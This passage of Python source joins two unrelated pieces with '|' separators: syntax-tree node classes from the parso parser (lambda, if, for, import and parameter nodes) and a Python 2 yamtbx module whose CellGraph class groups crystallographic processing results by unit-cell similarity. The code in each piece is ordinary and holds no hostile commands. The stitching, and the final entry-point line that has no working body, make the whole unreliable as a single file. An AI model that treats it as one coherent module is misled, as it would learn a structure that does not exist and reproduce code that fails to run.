    __slots__ = ()

    def __init__(self, children):
        # Deliberately skip Function.__init__ (call Function's parent):
        # a lambdef has no parentheses, so everything between `lambda`
        # and the `:` operator is a parameter.
        super(Function, self).__init__(children)
        self.children[1:-2] = _create_params(self, self.children[1:-2])

    @property
    def name(self):
        """Lambdas are anonymous: accessing ``name`` always raises."""
        raise AttributeError("lambda is not named.")

    def _get_param_nodes(self):
        return self.children[1:-2]

    @property
    def annotation(self):
        """Always ``None``; lambdas cannot carry annotations."""
        return None

    def __repr__(self):
        return "<{}@{}>".format(self.__class__.__name__, self.start_pos)
class Flow(PythonBaseNode):
    """Base class for control-flow statement nodes (if/while/for/try/with)."""
    __slots__ = ()
class IfStmt(Flow):
    type = 'if_stmt'
    __slots__ = ()

    def get_test_nodes(self):
        """
        Yield every ``test`` node guarded by ``if``/``elif``, e.g. both
        ``x`` occurrences in::

            if x:
                pass
            elif x:
                pass
        """
        # Pair every child with its successor; the test follows the keyword.
        for keyword, test in zip(self.children, self.children[1:]):
            if keyword in ('elif', 'if'):
                yield test

    def get_corresponding_test_node(self, node):
        """
        Return the test node of the branch that contains *node*.  If *node*
        lies inside a test expression itself (not in a suite), return None.
        """
        pos = node.start_pos
        for test in reversed(list(self.get_test_nodes())):
            if test.start_pos < pos:
                if pos < test.end_pos:
                    # node sits within the test expression itself.
                    return None
                return test

    def is_node_after_else(self, node):
        """Return ``True`` when *node* is positioned after an ``else``."""
        for child in self.children:
            if child == 'else' and node.start_pos > child.start_pos:
                return True
        return False
class WhileStmt(Flow):
    """A ``while`` loop statement node."""
    type = 'while_stmt'
    __slots__ = ()
class ForStmt(Flow):
    """A ``for`` loop statement node."""
    type = 'for_stmt'
    __slots__ = ()

    def get_testlist(self):
        """
        Returns the input node ``y`` from: ``for x in y:``.
        """
        return self.children[3]

    def get_defined_names(self, include_setitem=False):
        """Return the ``Name`` leafs bound by the loop target ``x``."""
        return _defined_names(self.children[1], include_setitem)
class TryStmt(Flow):
    type = 'try_stmt'
    __slots__ = ()

    def get_except_clause_tests(self):
        """
        Yield the ``test`` node of every ``except`` clause.  A bare
        ``except:`` (no exception given) contributes ``None``.
        """
        for child in self.children:
            if child.type == 'except_clause':
                yield child.children[1]
            elif child == 'except':
                yield None
class WithStmt(Flow):
    type = 'with_stmt'
    __slots__ = ()

    def get_defined_names(self, include_setitem=False):
        """
        Return the ``Name`` leafs this ``with`` statement binds — the
        targets that appear after ``as`` in its ``with_item`` children.
        """
        defined = []
        # Every second child starting at index 1 is a with item (the rest
        # are the `with` keyword, commas and the trailing colon/suite).
        for item in self.children[1:-2:2]:
            if item.type == 'with_item':
                defined.extend(
                    _defined_names(item.children[2], include_setitem))
        return defined

    def get_test_node_from_name(self, name):
        """
        Return the context-manager expression of the ``with_item`` that
        contains *name*; raise ``ValueError`` when *name* is not inside one.
        """
        item = search_ancestor(name, "with_item")
        if item is None:
            raise ValueError('The name is not actually part of a with statement.')
        return item.children[0]
class Import(PythonBaseNode):
    """Shared behaviour of ``import_name`` and ``import_from`` nodes."""
    __slots__ = ()

    def get_path_for_name(self, name):
        """
        Return the dotted path — a list of ``Name`` leafs — that leads up to
        and includes *name*.

        :raises ValueError: when *name* is not part of this import.
        """
        # If the name is an alias, map it back to the name it renames;
        # otherwise keep it unchanged.
        name = self._aliases().get(name, name)
        for path in self.get_paths():
            if name in path:
                return path[:path.index(name) + 1]
        raise ValueError('Name should be defined in the import itself')

    def is_nested(self):
        """Sub classes may overwrite this behavior; plain default is False."""
        return False

    def is_star_import(self):
        """``True`` for ``from x import *``."""
        return self.children[-1] == '*'
class ImportFrom(Import):
    """A ``from ... import ...`` statement node."""
    type = 'import_from'
    __slots__ = ()

    def get_defined_names(self, include_setitem=False):
        """
        Returns the list of `Name` leafs the import defines: the names after
        `import`, or — when an alias (`as`) is present — the alias.
        """
        return [alias or name for name, alias in self._as_name_tuples()]

    def _aliases(self):
        """Mapping from alias to its corresponding name."""
        return dict((alias, name) for name, alias in self._as_name_tuples()
                    if alias is not None)

    def get_from_names(self):
        """Return the ``Name`` leafs between ``from`` and ``import``."""
        # Skip leading relative dots; `n` keeps the first non-dot child.
        for n in self.children[1:]:
            if n not in ('.', '...'):
                break
        if n.type == 'dotted_name':  # from x.y import
            return n.children[::2]
        elif n == 'import':  # from . import
            return []
        else:  # from x import
            return [n]

    @property
    def level(self):
        """The level parameter of ``__import__`` (number of leading dots)."""
        level = 0
        for n in self.children[1:]:
            if n in ('.', '...'):
                # `...` is a single leaf of length 3.
                level += len(n.value)
            else:
                break
        return level

    def _as_name_tuples(self):
        """Yield ``(name, alias)`` pairs; alias is None without ``as``."""
        last = self.children[-1]
        if last == ')':
            # Parenthesized import list: the names are one child earlier.
            last = self.children[-2]
        elif last == '*':
            return  # No names defined directly.
        if last.type == 'import_as_names':
            as_names = last.children[::2]
        else:
            as_names = [last]
        for as_name in as_names:
            if as_name.type == 'name':
                yield as_name, None
            else:
                yield as_name.children[::2]  # yields x, y -> ``x as y``

    def get_paths(self):
        """
        The import paths defined in an import statement. Typically an array
        like this: ``[<Name: datetime>, <Name: date>]``.

        :return list of list of Name:
        """
        dotted = self.get_from_names()
        if self.children[-1] == '*':
            return [dotted]
        return [dotted + [name] for name, alias in self._as_name_tuples()]
class ImportName(Import):
    """For ``import_name`` nodes. Covers normal imports without ``from``."""
    type = 'import_name'
    __slots__ = ()

    def get_defined_names(self, include_setitem=False):
        """
        Returns the list of `Name` leafs the import defines. The defined name
        is always the first name after `import` or, in case an alias (`as`)
        is present, that alias.
        """
        return [alias or path[0] for path, alias in self._dotted_as_names()]

    @property
    def level(self):
        """The level parameter of ``__import__``."""
        return 0  # Obviously 0 for imports without from.

    def get_paths(self):
        """Return every imported dotted path as a list of ``Name`` leafs."""
        return [path for path, alias in self._dotted_as_names()]

    def _dotted_as_names(self):
        """Generator of (list(path), alias) where alias may be None."""
        dotted_as_names = self.children[1]
        if dotted_as_names.type == 'dotted_as_names':
            # `import a, b, c` — every second child is a name/dotted name.
            as_names = dotted_as_names.children[::2]
        else:
            as_names = [dotted_as_names]
        for as_name in as_names:
            if as_name.type == 'dotted_as_name':
                # `import x as y`: children are [x, 'as', y].
                alias = as_name.children[2]
                as_name = as_name.children[0]
            else:
                alias = None
            if as_name.type == 'name':
                yield [as_name], alias
            else:
                # dotted_names
                yield as_name.children[::2], alias

    def is_nested(self):
        """
        This checks for the special case of nested imports, without aliases and
        from statement::

            import foo.bar
        """
        return bool([1 for path, alias in self._dotted_as_names()
                     if alias is None and len(path) > 1])

    def _aliases(self):
        """
        :return dict: maps each alias Name to the last Name of its path.
        """
        return dict((alias, path[-1]) for path, alias in self._dotted_as_names()
                    if alias is not None)
class KeywordStatement(PythonBaseNode):
    """
    Covers the statements `assert`, `del`, `global`, `nonlocal`, `raise`,
    `return` and `yield`.

    `pass`, `continue` and `break` are not included, because they are just
    simple keywords and the parser reduces them to a keyword leaf.
    """
    __slots__ = ()

    @property
    def type(self):
        """
        The node type is derived from the keyword: ``<keyword>_stmt``.
        You can crosscheck this with the Python grammar.
        """
        return '%s_stmt' % self.keyword

    @property
    def keyword(self):
        """The statement's leading keyword, as a plain string."""
        return self.children[0].value

    def get_defined_names(self, include_setitem=False):
        """Names defined by this statement (del/global/nonlocal only)."""
        kw = self.keyword
        if kw == 'del':
            return _defined_names(self.children[1], include_setitem)
        if kw in ('global', 'nonlocal'):
            return self.children[1::2]
        return []
class AssertStmt(KeywordStatement):
    """An ``assert`` statement node."""
    __slots__ = ()

    @property
    def assertion(self):
        """The tested expression (first child after the ``assert`` keyword)."""
        return self.children[1]
class GlobalStmt(KeywordStatement):
    """A ``global`` statement node."""
    __slots__ = ()

    def get_global_names(self):
        """Return the ``Name`` leafs listed after ``global``."""
        return self.children[1::2]
class ReturnStmt(KeywordStatement):
    """A ``return`` statement node."""
    __slots__ = ()
class YieldExpr(PythonBaseNode):
    """A ``yield`` / ``yield from`` expression node."""
    type = 'yield_expr'
    __slots__ = ()
def _defined_names(current, include_setitem):
    """
    A helper function to find the defined names in statements, for loops and
    list comprehensions.

    Recurses through tuple/list targets; for attribute and (optionally)
    subscript targets it reports the relevant trailing name.
    """
    names = []
    if current.type in ('testlist_star_expr', 'testlist_comp', 'exprlist', 'testlist'):
        # Comma-separated targets: every second child is an element.
        for child in current.children[::2]:
            names += _defined_names(child, include_setitem)
    elif current.type in ('atom', 'star_expr'):
        # Parenthesized/bracketed or starred target: unwrap one level.
        names += _defined_names(current.children[1], include_setitem)
    elif current.type in ('power', 'atom_expr'):
        if current.children[-2] != '**':  # Just if there's no operation
            trailer = current.children[-1]
            if trailer.children[0] == '.':
                # Attribute assignment: `obj.attr = ...` defines `attr`.
                names.append(trailer.children[1])
            elif trailer.children[0] == '[' and include_setitem:
                # Subscript assignment: walk backwards to the base name or
                # the nearest preceding trailer.
                for node in current.children[-2::-1]:
                    if node.type == 'trailer':
                        names.append(node.children[1])
                        break
                    if node.type == 'name':
                        names.append(node)
                        break
    else:
        # A plain Name leaf.
        names.append(current)
    return names
class ExprStmt(PythonBaseNode, DocstringMixin):
    """An expression statement, covering assignments and annotations."""
    type = 'expr_stmt'
    __slots__ = ()

    def get_defined_names(self, include_setitem=False):
        """
        Returns a list of `Name` defined before the `=` sign.
        """
        names = []
        if self.children[1].type == 'annassign':
            # Annotated assignment (`x: int = ...`) defines its target.
            names = _defined_names(self.children[0], include_setitem)
        # Every `lhs = ` pair: operator children sit at odd indices.
        return [
            name
            for i in range(0, len(self.children) - 2, 2)
            if '=' in self.children[i + 1].value
            for name in _defined_names(self.children[i], include_setitem)
        ] + names

    def get_rhs(self):
        """Returns the right-hand-side of the equals."""
        node = self.children[-1]
        if node.type == 'annassign':
            if len(node.children) == 4:
                # `: annotation = value` -> value is the 4th child.
                node = node.children[3]
            else:
                # Annotation only; the annotation is the "rhs".
                node = node.children[1]
        return node

    def yield_operators(self):
        """
        Returns a generator of `+=`, `=`, etc. or None if there is no operation.
        """
        first = self.children[1]
        if first.type == 'annassign':
            if len(first.children) <= 2:
                return  # No operator is available, it's just PEP 484.
            first = first.children[2]
        yield first
        yield from self.children[3::2]
class NamedExpr(PythonBaseNode):
    """A walrus expression ``target := value`` (``namedexpr_test``)."""
    type = 'namedexpr_test'

    def get_defined_names(self, include_setitem=False):
        """Return the ``Name`` leafs bound by the ``:=`` target."""
        return _defined_names(self.children[0], include_setitem)
class Param(PythonBaseNode):
    """
    It's a helper class that makes business logic with params much easier. The
    Python grammar defines no ``param`` node. It defines it in a different way
    that is not really suited to working with parameters.
    """
    type = 'param'

    def __init__(self, children, parent):
        super().__init__(children)
        # Params are created after the normal parse; wire up both directions.
        self.parent = parent
        for child in children:
            child.parent = self

    @property
    def star_count(self):
        """
        Is `0` in case of `foo`, `1` in case of `*foo` or `2` in case of
        `**foo`.
        """
        first = self.children[0]
        if first in ('*', '**'):
            return len(first.value)
        return 0

    @property
    def default(self):
        """
        The default is the test node that appears after the `=`. Is `None` in
        case no default is present.
        """
        # A trailing comma shifts the `=`/value positions by one.
        has_comma = self.children[-1] == ','
        try:
            if self.children[-2 - int(has_comma)] == '=':
                return self.children[-1 - int(has_comma)]
        except IndexError:
            return None

    @property
    def annotation(self):
        """
        The annotation is the test node that appears after `:`. Is `None` in
        case no annotation is present.
        """
        tfpdef = self._tfpdef()
        if tfpdef.type == 'tfpdef':
            assert tfpdef.children[1] == ":"
            assert len(tfpdef.children) == 3
            annotation = tfpdef.children[2]
            return annotation
        else:
            return None

    def _tfpdef(self):
        """
        tfpdef: see e.g. grammar36.txt.  Skips a leading `*`/`**` if present.
        """
        offset = int(self.children[0] in ('*', '**'))
        return self.children[offset]

    @property
    def name(self):
        """
        The `Name` leaf of the param.
        """
        if self._tfpdef().type == 'tfpdef':
            return self._tfpdef().children[0]
        else:
            return self._tfpdef()

    def get_defined_names(self, include_setitem=False):
        """A param defines exactly its own name."""
        return [self.name]

    @property
    def position_index(self):
        """
        Property for the positional index of a parameter.
        """
        index = self.parent.children.index(self)
        try:
            keyword_only_index = self.parent.children.index('*')
            if index > keyword_only_index:
                # Skip the ` *, `
                index -= 2
            # NOTE(review): params after a bare `*` or `/` marker are offset
            # by the marker and its comma, hence the -2 adjustments.
        except ValueError:
            pass
        try:
            keyword_only_index = self.parent.children.index('/')
            if index > keyword_only_index:
                # Skip the ` /, `
                index -= 2
        except ValueError:
            pass
        # -1 accounts for the opening parenthesis at index 0.
        return index - 1

    def get_parent_function(self):
        """
        Returns the function/lambda of a parameter.
        """
        return search_ancestor(self, 'funcdef', 'lambdef')

    def get_code(self, include_prefix=True, include_comma=True):
        """
        Like all the other get_code functions, but includes the param
        `include_comma`.

        :param include_comma bool: If enabled includes the comma in the string output.
        """
        if include_comma:
            return super().get_code(include_prefix)
        # Drop a trailing comma from the rendered children.
        children = self.children
        if children[-1] == ',':
            children = children[:-1]
        return self._get_code_for_children(
            children,
            include_prefix=include_prefix
        )

    def __repr__(self):
        default = '' if self.default is None else '=%s' % self.default.get_code()
        return '<%s: %s>' % (type(self).__name__, str(self._tfpdef()) + default)
class SyncCompFor(PythonBaseNode):
    """The ``for`` part of a comprehension (without a leading ``async``)."""
    type = 'sync_comp_for'
    __slots__ = ()

    def get_defined_names(self, include_setitem=False):
        """
        Returns the list of `Name` leafs that the comprehension target defines.
        """
        # allow async for
        return _defined_names(self.children[1], include_setitem)
# Backwards-compatibility alias: kept so an older Jedi version can work with
# this new parso version. Can be deleted in the next release.
CompFor = SyncCompFor
class UsedNamesMapping(Mapping):
    """
    A read-only mapping wrapper: exists for the sole purpose of making the
    used-names dict immutable.  Hashed and compared by identity.
    """

    def __init__(self, dct):
        self._dict = dct

    def __getitem__(self, key):
        return self._dict[key]

    def __len__(self):
        return len(self._dict)

    def __iter__(self):
        return iter(self._dict)

    def __hash__(self):
        # Identity hash: each mapping instance is its own key.
        return id(self)

    def __eq__(self, other):
        # Comparing the dict contents would make no sense here.
        return self is other
|
|
"""
(c) RIKEN 2015. All rights reserved.
Author: Keitaro Yamashita
This software is released under the new BSD License; see LICENSE.
"""
import iotbx.phil
from cctbx import uctbx
from cctbx import sgtbx
from cctbx import crystal
from cctbx.crystal import reindex
from cctbx.uctbx.determine_unit_cell import NCDist
from cctbx.sgtbx import pointgroup_tools
from yamtbx.dataproc.xds.xparm import XPARM
from yamtbx.dataproc.xds.xds_ascii import XDS_ASCII
from yamtbx.dataproc import pointless
from yamtbx.dataproc.xds import correctlp
from yamtbx.dataproc.dials.command_line import run_dials_auto
from yamtbx import util
from yamtbx.util import xtal
import os
import sys
import networkx as nx
import numpy
master_params_str = """
topdir = None
.type = path
xdsdir = None
.type = path
.multiple = true
.help = Either topdir= or (multiple) xdsdir= should be specified.
tol_length = 0.1
.type = float
.help = relative_length_tolerance
tol_angle = 5
.type = float
.help = absolute_angle_tolerance in degree
do_pointless = False
.type = bool
.help = Run pointless for largest group data to determine symmetry
"""
class CellGraph:
    """
    Builds an undirected graph over processing results (XDS or DIALS) whose
    primitive P1 unit cells are mutually compatible — either directly or via
    a change-of-basis operator — and groups the results into connected
    components for merging.  (Python 2 code.)
    """
    def __init__(self, tol_length=None, tol_angle=None):
        # Tolerances for unit-cell comparison: relative length and absolute
        # angle (degrees); defaults mirror the PHIL defaults above.
        self.tol_length = tol_length if tol_length else 0.1
        self.tol_angle = tol_angle if tol_angle else 5
        self.G = nx.Graph()
        self.p1cells = {} # key->p1cell
        self.dirs = {} # key->xdsdir
        self.symms = {} # key->symms
        self.cbops = {} # (key1,key2) = cbop
    # __init__()

    def get_p1cell_and_symm(self, xdsdir):
        """
        Read the processing result in `xdsdir` and return a tuple of
        (P1 unit cell, crystal symmetry), or (None, None) when the needed
        files are missing or unreadable.  XDS output is preferred; DIALS
        output (DIALS.HKL) is used as a fallback.
        """
        dials_hkl = os.path.join(xdsdir, "DIALS.HKL")
        xac_file = util.return_first_found_file(("XDS_ASCII.HKL", "XDS_ASCII.HKL.org",
                                                 "XDS_ASCII_fullres.HKL.org", "XDS_ASCII_fullres.HKL",
                                                 "XDS_ASCII.HKL_noscale.org", "XDS_ASCII.HKL_noscale"),
                                                wd=xdsdir)
        p1cell, xs = None, None
        if xac_file:
            correct_lp = util.return_first_found_file(("CORRECT.LP_noscale", "CORRECT.LP"), wd=xdsdir)
            if not correct_lp:
                print "CORRECT.LP not found in %s" % xdsdir
                return None, None
            p1cell = correctlp.get_P1_cell(correct_lp, force_obtuse_angle=True)
            try:
                xac = XDS_ASCII(xac_file, read_data=False)
            except:
                print "Invalid XDS_ASCII format:", xac_file
                return None, None
            xs = xac.symm
        elif os.path.isfile(dials_hkl): # DIALS
            xs = run_dials_auto.get_most_possible_symmetry(xdsdir)
            if xs is None:
                print "Cannot get crystal symmetry:", xdsdir
                return None, None
            p1cell = list(xs.niggli_cell().unit_cell().parameters())
            # force obtuse angle
            tmp = map(lambda x: (x[0]+3,abs(90.-x[1])), enumerate(p1cell[3:])) # Index and difference from 90 deg
            tmp.sort(key=lambda x: x[1], reverse=True)
            if p1cell[tmp[0][0]] < 90:
                # Flip the two angles deviating most from 90 deg so the cell
                # setting matches the obtuse convention used for XDS results.
                tmp = map(lambda x: (x[0]+3,90.-x[1]), enumerate(p1cell[3:])) # Index and 90-val.
                tmp.sort(key=lambda x: x[1], reverse=True)
                for i,v in tmp[:2]: p1cell[i] = 180.-p1cell[i]
            p1cell = uctbx.unit_cell(p1cell)
        return p1cell, xs
    # get_p1cell_and_symm()

    def add_proc_result(self, key, xdsdir):
        """
        Register the processing directory `xdsdir` under `key`: store its P1
        cell and symmetry, then connect it in the graph to every node whose
        cell is similar (directly, or after a reindexing operator which is
        remembered in self.cbops).
        """
        if key in self.G: return #G.remove_node(key)
        p1cell, symm = self.get_p1cell_and_symm(xdsdir)
        if None in (p1cell, symm): return
        self.p1cells[key] = p1cell
        self.dirs[key] = xdsdir
        self.symms[key] = symm
        connected_nodes = []
        for node in self.G.nodes():
            other_cell = self.p1cells[node]
            if other_cell.is_similar_to(p1cell, self.tol_length, self.tol_angle):
                connected_nodes.append(node)
            else:
                # Not directly similar: try to relate the two cells by a
                # change-of-basis operator.
                cosets = reindex.reindexing_operators(crystal.symmetry(other_cell, 1),
                                                      crystal.symmetry(p1cell, 1),
                                                      self.tol_length, self.tol_angle)
                if cosets.double_cosets is not None:
                    self.cbops[(node,key)] = cosets.combined_cb_ops()[0]
                    print p1cell, other_cell, self.cbops[(node,key)], other_cell.change_basis(self.cbops[(node,key)])
                    connected_nodes.append(node)
        # Add nodes and edges
        self.G.add_node(key)
        for node in connected_nodes:
            self.G.add_edge(node, key)
    # add_proc_result()

    def _transformed_cells(self, keys):
        """
        Return the P1 cell parameters of all `keys`, each transformed into
        the basis of keys[0] using the stored change-of-basis operators.
        """
        cells = [self.p1cells[keys[0]].parameters()]
        for key in keys[1:]:
            cell = self.p1cells[key]
            if (keys[0], key) in self.cbops:
                cell = cell.change_basis(self.cbops[(keys[0], key)])
            elif (key, keys[0]) in self.cbops:
                cell = cell.change_basis(self.cbops[(key, keys[0])].inverse()) # correct??
            cells.append(cell.parameters())
        return cells
    # _transformed_cells()

    def _average_p1_cell(self, keys):
        """Element-wise mean of the transformed P1 cells of `keys`."""
        cells = numpy.array(self._transformed_cells(keys))
        return map(lambda i: cells[:,i].mean(), xrange(6))
    # _average_p1_cell()

    def group_xds_results(self, out, show_details=True):
        """
        Partition the graph into connected components (largest first) and,
        when `show_details` is True, print the candidate symmetries of each
        group together with how often each was chosen by individual results.
        Fills self.groups, self.grouped_dirs and self.reference_symmetries.
        """
        print >>out, "Making groups from %d results\n" % len(self.p1cells) # Show total and failed!!
        self.groups = map(lambda g: list(g), nx.connected_components(self.G))
        self.groups.sort(key=lambda x:-len(x))
        self.grouped_dirs = []
        self.reference_symmetries = []
        #details_str = "group file a b c al be ga\n"
        #ofs_debug = open("cell_debug.dat", "w")
        #ofs_debug.write("group xdsdir a b c al be ga\n")
        for i, keys in enumerate(self.groups):
            self.reference_symmetries.append([])
            avg_cell = uctbx.unit_cell(self._average_p1_cell(keys))
            print >>out, "[%2d]"%(i+1), len(keys), "members:"
            print >>out, " Averaged P1 Cell=", " ".join(map(lambda x:"%.2f"%x, avg_cell.parameters()))
            #from yamtbx.util.xtal import format_unit_cell
            #for xd, uc in zip(map(lambda k:self.dirs[k], keys), self._transformed_cells(keys)):
            # ofs_debug.write("%3d %s %s\n" % (i, xd, format_unit_cell(uc)))
            #print >>out, " Members=", keys
            if show_details:
                # by explore_metric_symmetry
                sg_explorer = pointgroup_tools.space_group_graph_from_cell_and_sg(avg_cell, sgtbx.space_group_info("P1").group(), max_delta=10)
                tmp = []
                for obj in sg_explorer.pg_graph.graph.node_objects.values():
                    pg = obj.allowed_xtal_syms[0][0].space_group().build_derived_reflection_intensity_group(True).info()
                    cbop = obj.allowed_xtal_syms[0][1]
                    trans_cell = avg_cell.change_basis(cbop)
                    if pg.group() == sgtbx.space_group_info("I2").group():
                        print >>out, "Warning!! I2 cell was given." # this should not happen..
                    # Transform to best cell
                    fbc = crystal.find_best_cell(crystal.symmetry(trans_cell, space_group_info=pg,
                                                                  assert_is_compatible_unit_cell=False),
                                                 best_monoclinic_beta=False) # If True, C2 may result in I2..
                    cbop = fbc.cb_op() * cbop
                    trans_cell = trans_cell.change_basis(fbc.cb_op())
                    #print "debug:: op-to-best-cell=", fbc.cb_op()
                    # If beta<90 in monoclinic system, force it to have beta>90
                    if pg.group().crystal_system() == "Monoclinic" and trans_cell.parameters()[4] < 90:
                        op = sgtbx.change_of_basis_op("-h,-k,l")
                        cbop = op * cbop
                        trans_cell = trans_cell.change_basis(op)
                    tmp.append([0, pg, trans_cell, cbop, pg.type().number()])
                # Calculate frequency
                for pgnum in set(map(lambda x: x[-1], tmp)):
                    sel = filter(lambda x: tmp[x][-1]==pgnum, xrange(len(tmp)))
                    pgg = tmp[sel[0]][1].group()
                    if len(sel) == 1:
                        # Unique setting for this point group: count members
                        # whose intensity group matches.
                        freq = len(filter(lambda x: self.symms[x].space_group().build_derived_reflection_intensity_group(True) == pgg, keys))
                        tmp[sel[0]][0] = freq
                    else:
                        # Several alternative settings: assign each member to
                        # the setting with the closest cell parameters.
                        trans_cells = map(lambda x: numpy.array(tmp[x][2].parameters()), sel)
                        for key in keys:
                            if self.symms[key].space_group().build_derived_reflection_intensity_group(True) != pgg: continue
                            cell = numpy.array(self.symms[key].unit_cell().parameters())
                            celldiffs = map(lambda tc: sum(abs(tc-cell)), trans_cells)
                            min_key = celldiffs.index(min(celldiffs))
                            tmp[sel[min_key]][0] += 1
                print >>out, " Possible symmetries:"
                print >>out, " freq symmetry a b c alpha beta gamma reindex"
                for freq, pg, trans_cell, cbop, pgnum in sorted(tmp, key=lambda x:x[-1]):
                    print >> out, " %4d %-10s %s %s" % (freq, pg, " ".join(map(lambda x:"%6.2f"%x, trans_cell.parameters())), cbop)
                    self.reference_symmetries[i].append((pg, trans_cell, freq))
                print >>out, ""
            dirs = map(lambda x: self.dirs[x], keys)
            self.grouped_dirs.append(dirs)
    # group_xds_results()

    def get_reference_symm(self, group_idx, rs_idx):
        """
        Return the crystal symmetry at index `rs_idx` of group `group_idx`,
        or None when either index is out of range.
        """
        # XXX should be able to specify space group with screws
        if group_idx >= len(self.reference_symmetries):
            return None
        if rs_idx >= len(self.reference_symmetries[group_idx]):
            return None
        pg, cell, freq = self.reference_symmetries[group_idx][rs_idx]
        return crystal.symmetry(cell,
                                space_group_info=pg,
                                assert_is_compatible_unit_cell=False)
    # get_reference_symm()

    def get_selectable_symms(self, group_idx):
        """Return the (pg, cell, freq) tuples of a group; [] if out of range."""
        if group_idx >= len(self.reference_symmetries):
            return []
        return self.reference_symmetries[group_idx]
    # get_selectable_symms()

    def get_most_frequent_symmetry(self, group_idx):
        """
        Return the symmetry most often chosen by the group's members,
        preferring a non-P1 symmetry when one exists.
        """
        # Should call after self.group_xds_results()
        symms = filter(lambda x: x[2]>0, self.reference_symmetries[group_idx])
        symms.sort(key=lambda x: x[2], reverse=True)
        if len(symms) == 0: return None
        if len(symms) > 1 and symms[0][0].group() == sgtbx.space_group_info("P1").group():
            return crystal.symmetry(symms[1][1], space_group_info=symms[1][0],
                                    assert_is_compatible_unit_cell=False)
        else:
            return crystal.symmetry(symms[0][1], space_group_info=symms[0][0],
                                    assert_is_compatible_unit_cell=False)
    # get_most_frequent_symmetry()

    def get_symmetry_reference_matched(self, group_idx, ref_cs):
        """
        Return the group symmetry whose point group matches `ref_cs`,
        choosing the candidate cell closest to the reference cell when
        several settings share that point group; None if no match.
        """
        ref_pg = ref_cs.space_group().build_derived_reflection_intensity_group(True)
        ref_cell = ref_cs.unit_cell()
        symms = filter(lambda x: x[0].group()==ref_pg, self.reference_symmetries[group_idx])
        if len(symms) == 0: return None
        if len(symms) > 1:
            # TODO if different too much?
            celldiffs = map(lambda s: s[1].bases_mean_square_difference(ref_cell), symms)
            min_idx = celldiffs.index(min(celldiffs))
            return crystal.symmetry(symms[min_idx][1], space_group_info=symms[min_idx][0],
                                    assert_is_compatible_unit_cell=False)
        else:
            return crystal.symmetry(symms[0][1], space_group_info=symms[0][0],
                                    assert_is_compatible_unit_cell=False)
    # get_symmetry_reference_matched()

    def get_group_symmetry_reference_matched(self, ref_cs):
        """
        Return the 1-based index of the group whose averaged Niggli cell is
        closest (by NCDist) to the reference crystal symmetry `ref_cs`.
        """
        ref_v6 = xtal.v6cell(ref_cs.niggli_cell().unit_cell())
        ncdists = []
        for i, keys in enumerate(self.groups):
            v6 = xtal.v6cell(uctbx.unit_cell(self._average_p1_cell(keys)).niggli_cell())
            ncdists.append(NCDist(v6, ref_v6))
            print "Group %d: NCDist to reference: %f" % (i+1, ncdists[-1])
        return ncdists.index(min(ncdists))+1
    # get_group_symmetry_reference_matched()

    def is_all_included(self, keys):
        """True when every key in `keys` is already a node of the graph."""
        all_nodes = set(self.G.nodes())
        return all_nodes.issuperset(keys)
    # is_all_included()

    def get_subgraph(self, keys):
        """Return a new CellGraph restricted to `keys` (shallow copies)."""
        copied_obj = CellGraph(self.tol_length, self.tol_angle)
        copied_obj.G = self.G.subgraph(keys)
        copied_obj.p1cells = dict((k, self.p1cells[k]) for k in keys)
        copied_obj.dirs = dict((k, self.dirs[k]) for k in keys)
        copied_obj.symms = dict((k, self.symms[k]) for k in keys)
        # NOTE(review): `or` also keeps cbops touching only ONE kept key; if
        # the intent is pairs fully inside the subgraph, `and` may be meant
        # - confirm before changing.
        copied_obj.cbops = dict((k, self.cbops[k]) for k in self.cbops if k[0] in keys or k[1] in keys) # XXX may be slow
        return copied_obj
    # get_subgraph()
# class CellGraph
def run(params, out=sys.stdout):
    """
    Collect processing directories (from params.xdsdir or by walking
    params.topdir), group them by unit-cell compatibility and report the
    largest group; optionally run pointless on it.  Returns the CellGraph.
    """
    cm = CellGraph(tol_length=params.tol_length, tol_angle=params.tol_angle)
    if not params.xdsdir and params.topdir:
        # Auto-discover: any directory containing an XDS_ASCII.HKL* or
        # DIALS.HKL file is treated as a processing result.
        params.xdsdir = map(lambda x: x[0], filter(lambda x: any(map(lambda y: y.startswith("XDS_ASCII.HKL"), x[2])) or "DIALS.HKL" in x[2],
                                                   os.walk(params.topdir)))
    for i, xdsdir in enumerate(params.xdsdir):
        cm.add_proc_result(i, xdsdir)
    cm.group_xds_results(out)
    ret = cm.grouped_dirs
    if len(ret) == 0:
        return cm
    print >>out
    print >>out, "About the largest group:"
    for idx, wd in enumerate(ret[0]):
        xac_hkl = os.path.join(wd, "XDS_ASCII.HKL")
        correct_lp = os.path.join(wd, "CORRECT.LP")
        print >>out, "%.3d %s" % (idx, os.path.relpath(wd, params.topdir) if params.topdir is not None else wd),
        if not os.path.isfile(xac_hkl):
            print >>out, "Unsuccessful"
            continue
        sg = XDS_ASCII(xac_hkl, read_data=False).symm.space_group_info()
        clp = correctlp.CorrectLp(correct_lp)
        if "all" in clp.table:
            cmpl = clp.table["all"]["cmpl"][-1]
        else:
            cmpl = float("nan")
        ISa = clp.a_b_ISa[-1]
        print >>out, "%10s ISa=%5.2f Cmpl=%5.1f " % (sg, ISa, cmpl)
    if params.do_pointless:
        worker = pointless.Pointless()
        files = map(lambda x: os.path.join(x, "INTEGRATE.HKL"), ret[0])
        #print files
        files = filter(lambda x: os.path.isfile(x), files)
        print >>out, "\nRunning pointless for the largest member."
        result = worker.run_for_symm(xdsin=files,
                                     logout="pointless.log",
                                     tolerance=10, d_min=5)
        if "symm" in result:
            print >>out, " pointless suggested", result["symm"].space_group_info()
    if 0:
        # Dead debug code (never executed). NOTE(review): `G` is undefined
        # in this scope - it would need cm.G if ever re-enabled.
        import pylab
        pos = nx.spring_layout(G)
        #pos = nx.spectral_layout(G)
        #pos = nx.circular_layout(G)
        #nx.draw_networkx_nodes(G, pos, node_size = 100, nodelist=others, node_color = 'w')
        nx.draw_networkx_nodes(G, pos, node_size = 100, node_color = 'w')
        nx.draw_networkx_edges(G, pos, width = 1)
        nx.draw_networkx_labels(G, pos, font_size = 12, font_family = 'sans-serif', font_color = 'r')
        pylab.xticks([])
        pylab.yticks([])
        pylab.savefig("network.png")
        pylab.show()
    return cm
# run()
def run_from_args(argv):
    """
    Parse PHIL parameters and bare directory arguments from `argv`, default
    topdir to the current directory when nothing was given, then call run().
    """
    cmdline = iotbx.phil.process_command_line(args=argv,
                                              master_string=master_params_str)
    params = cmdline.work.extract()
    args = cmdline.remaining_args
    for arg in args:
        # First bare directory argument becomes topdir.
        if os.path.isdir(arg) and params.topdir is None:
            params.topdir = arg
    if not params.xdsdir and params.topdir is None:
        params.topdir = os.getcwd()
    run(params)
# run_from_args()
if __name__ == "__main__":
    # Script entry point: forward command-line args (without program name).
